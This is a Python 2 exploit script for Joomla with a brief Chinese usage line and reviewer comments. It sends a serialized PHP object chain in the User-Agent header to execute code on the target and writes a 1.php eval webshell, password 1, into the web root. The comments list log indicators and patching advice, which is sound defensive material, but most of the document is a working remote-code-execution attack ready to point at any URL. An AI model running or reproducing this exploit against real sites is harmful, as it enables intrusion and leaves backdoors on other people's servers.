利用方法如下:joomla.py http://xxx.xxx.xxx/index.php
执行完成后,DOS 界面返回空白,并在站点根目录生成一个 1.php 小马文件,密码为 1。
# Python 2 script (urllib2, cookielib, print statement); it does not run on Python 3.
# It sends two HTTP requests to the URL given as the first command-line argument:
#   1. one whose User-Agent header is a PHP-serialized object string naming Joomla
#      classes (JDatabaseDriverMysqli, JSimplepieFactory, SimplePie);
#   2. one to the same URL without that header, whose response body is searched
#      for text between the markers '->|' and '|<-'.
# NOTE(review): presumably the target stores the User-Agent in its session and
# unserializes it on the follow-up request, which would explain the shared cookie
# jar -- confirm against the vendor advisory for the affected Joomla release.
#
# Indicators a defender can derive from this listing:
#   - access-log User-Agent values beginning with '}__test|O:' or containing the
#     class names above;
#   - a query string of the form '?1=' followed by URL-encoded PHP;
#   - an unexpected file named 1.php next to the requested script.
# Mitigation is to run a patched Joomla release and to review the web root and
# session storage of any site that logged such a request.
import urllib
import re

__author__ = 'nlfox233'
# The next two comment lines are not at the top of the file, so they presumably
# have no effect as a shebang or as a source-encoding declaration.
# !/usr/bin/python
# coding=utf-8
import urllib2
import cookielib, sys

# Target URL comes straight from argv; no validation is performed.
site = sys.argv[1]
#site = 'http://127.0.0.1/autoinstalator/joomla/index.php'
# PHP expression carried in the query string: it writes a file named 1.php into the
# directory of the requested script. The base64 literal decodes to a one-line PHP
# eval stub keyed on POST parameter 1 (the "password 1" mentioned in the write-up).
code = "file_put_contents(dirname($_SERVER['SCRIPT_FILENAME']).'/1.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'))"
# The PHP is wrapped in '->|' ... '|<-' echo markers and URL-encoded into parameter 1.
url = site + '?1=' + urllib.quote("@ini_set(\"display_errors\",\"0\");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';" + code + ";echo '|<-';")
# A single cookie jar is shared by both requests, so any session cookie set by the
# first response is sent back with the second.
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
# Global socket timeout of 30 seconds for both requests.
urllib2.socket.setdefaulttimeout(30)
# Serialized PHP object string sent as the User-Agent. Its feed_url field holds
# 'eval($_REQUEST[1]);...' and cache_name_function is 'assert', which ties it to
# the '1' request parameter built above. The trailing bytes \xF0\x9D\x8C\x86 are a
# 4-byte UTF-8 sequence.
# NOTE(review): that trailing sequence presumably truncates the stored value in a
# 3-byte-utf8 database column -- confirm.
ua = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:46:"eval($_REQUEST[1]);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86'
# Request 1: carries the crafted User-Agent; the response is discarded.
req = urllib2.Request(url=url, headers={'User-Agent': ua})
opener.open(req)
# Request 2: same URL, default headers; the body is read in full.
req = urllib2.Request(url=url)
res = opener.open(req).read()
# Take the first marker-delimited span; [0] raises IndexError when the markers are
# absent from the response.
resText = re.findall(r'\-\>\|(.*?)\|\<\-', res, re.DOTALL)[0]
print resText